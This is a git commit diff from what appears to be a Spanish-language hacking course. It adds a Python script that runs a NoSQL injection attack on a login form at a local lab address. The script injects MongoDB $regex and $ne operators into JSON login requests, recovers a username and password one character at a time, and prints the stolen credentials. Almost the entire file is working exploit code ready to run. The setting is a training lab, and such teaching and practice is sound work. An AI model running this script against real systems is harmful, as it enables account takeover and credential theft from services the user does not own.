Update tema 6

2024-02-14 02:30:34 +01:00
parent 5d511cbad3
commit 8f96712d57
2 changed files with 316 additions and 1 deletions
--- a/Introduccion-hacking-hack4u/tema_6_owasp/13_nosqli/nosqli.py
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/13_nosqli/nosqli.py
@@ -0,0 +1,117 @@
+#!/usr/bin/env python
+"""
+Script para hacer un ataque de fuerza bruta a un login con NoSQL Injection.
+Encuentra el primer usuario y su contraseña.
+"""
+
+import os
+import requests
+import signal
+import string
+import sys
+import time
+
+from pwn import *
+from termcolor import colored
+
+
+def def_handler(sig, frame):
+    print(colored("\n\n[!] Saliendo...\n", "red"))
+    sys.exit(1)
+
+
+# Ctrl+C
+signal.signal(signal.SIGINT, def_handler)
+
+
+# Variables globales
+login_url = "http://localhost:4000/user/login"
+characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
+users_passwords = {}
+
+
+def makeNoSQLIuser():
+
+    os.system("clear")
+
+    user = ""
+
+    p1 = log.progress(colored("Bruteando user", "magenta"))
+    p1.status(colored("Iniciando ataque", "cyan"))
+
+    time.sleep(2)
+
+    p2 = log.progress(colored("User", "magenta"))
+
+    for position in range(0, 30):
+        for char in characters:
+            post_data = '{"username":{"$regex":"^%s%s"},"password":{"$ne": "admin"}}' % (
+                user, char
+            )
+
+            p1.status(colored(post_data, "blue"))
+
+            headers = {
+                "Content-Type": "application/json"
+            }
+
+            r = requests.post(login_url, data=post_data, headers=headers)
+
+            if "Logged in as user" in r.text:
+                user += char
+                p2.status(colored(user, "green"))
+                break
+
+    return user
+
+
+def makeNoSQLIpass(user):
+
+    os.system("clear")
+
+    password = ""
+
+    p1 = log.progress(colored(f"Bruteando password de {user}", "magenta"))
+    p1.status(colored("Iniciando ataque", "cyan"))
+
+    time.sleep(2)
+
+    p2 = log.progress(colored("Password", "magenta"))
+
+    for position in range(0, 50):
+        for char in characters:
+            user_json = '{"username":"%s","password"' % user
+            post_data = user_json + ':{"$regex":"^%s%s"}}' % (
+                password, char
+            )
+
+            p1.status(colored(post_data, "blue"))
+
+            headers = {
+                "Content-Type": "application/json"
+            }
+
+            r = requests.post(login_url, data=post_data, headers=headers)
+
+            if "Logged in as user" in r.text:
+                password += char
+                p2.status(colored(password, "green"))
+                break
+
+    return password
+
+if __name__ == '__main__':
+
+
+
+    user = makeNoSQLIuser()
+
+    password = makeNoSQLIpass(user)
+
+    users_passwords[user] = password
+
+    os.system("clear")
+    time.sleep(1)
+
+    for u, p in users_passwords.items():
+        print(colored(f"\n[+] {u}:{p}\n", "green"))